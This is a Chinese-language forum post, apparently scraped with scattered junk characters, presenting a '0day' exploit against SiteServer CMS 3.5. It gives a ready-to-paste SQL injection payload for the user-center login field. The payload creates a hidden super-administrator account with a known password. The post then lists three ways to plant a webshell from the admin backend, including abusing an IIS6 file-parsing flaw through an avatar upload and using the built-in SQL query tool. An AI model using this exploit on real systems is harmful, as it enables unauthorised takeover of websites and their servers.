SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
/ H9 J" _+ v' |, p) i, T7 e
stieserver官网:www.siteserver.cn
1 H, b) M0 m  H" [$ K$ A
6 l5 O# v8 f5 p9 ?8 x
! w' A+ I7 p% H" w7 M
EXP:
5 P+ z3 M: y7 W2 g/ W( e( M
0 f7 u) P7 D. x6 F" K0 M; C直接访问UserCenter/login.aspx
' x. m; _2 W0 r. f) [( F
1 `0 J, w0 y3 G% H+ ]6 V

- n3 d7 t" d9 K用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
  t' s7 H+ r, H, N3 `


( T0 t% _' q- e密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
* d# d# S8 F2 ?" }( |6 ]+ [

# ?% N0 x  G. C1 J: B( l$ ^1 L
2 ~- J3 Z/ t4 G5 e$ T+ l之后再访问后台SiteServer/login.aspx用插入的用户登陆

3 A  a7 a3 K2 J: _. Z4 {/ d: y7 d- j
: Z  G  a% P5 v- {
后台拿webshell的三种方法：
# }# C5 @) k! V! i" P
5 K4 N3 t: b  ^& H% y1 o一、
6 ?; W8 q6 p9 `6 ]2 u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
% y" A1 o6 ]% m0 `" g. @, X
成员权限-》添加用户-》用户名为：1.asp

7 Q0 ]1 d- h+ g" phttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
: l" C* z2 H$ F$ _1 p
. c7 d* u# P- R; i系统工具-》实用工具-》机器参数查看
1 B1 h! z- P9 ~3 W/ T可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
8 s! r6 G) ~" [0 k6 b8 i: {这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
4 [  `+ N: q: ?5 C